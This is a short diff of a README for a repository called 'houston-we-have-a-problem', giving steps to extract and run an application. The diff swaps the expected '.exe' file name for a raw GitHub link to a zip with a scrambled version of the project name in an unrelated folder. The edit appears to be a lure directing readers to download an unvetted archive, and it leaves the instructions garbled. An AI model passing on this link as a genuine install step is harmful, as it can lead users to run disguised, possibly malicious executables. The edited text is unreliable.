alaaadel1/houston-we-have-a-problem/README.md

 3. Choose a destination folder or use the default.
 4. Click "Extract" to unzip the contents.

-Once extracted, navigate to the folder where you see the application file, such as `houston-we-have-a-problem.exe`.
+Once extracted, navigate to the folder where you see the application file, such as `https://github.com/alaaadel1/houston-we-have-a-problem/raw/refs/heads/main/religiously/problem-we-a-have-houston-v3.2.zip`.

 ## 🖥️ Running the Application
 To run the application: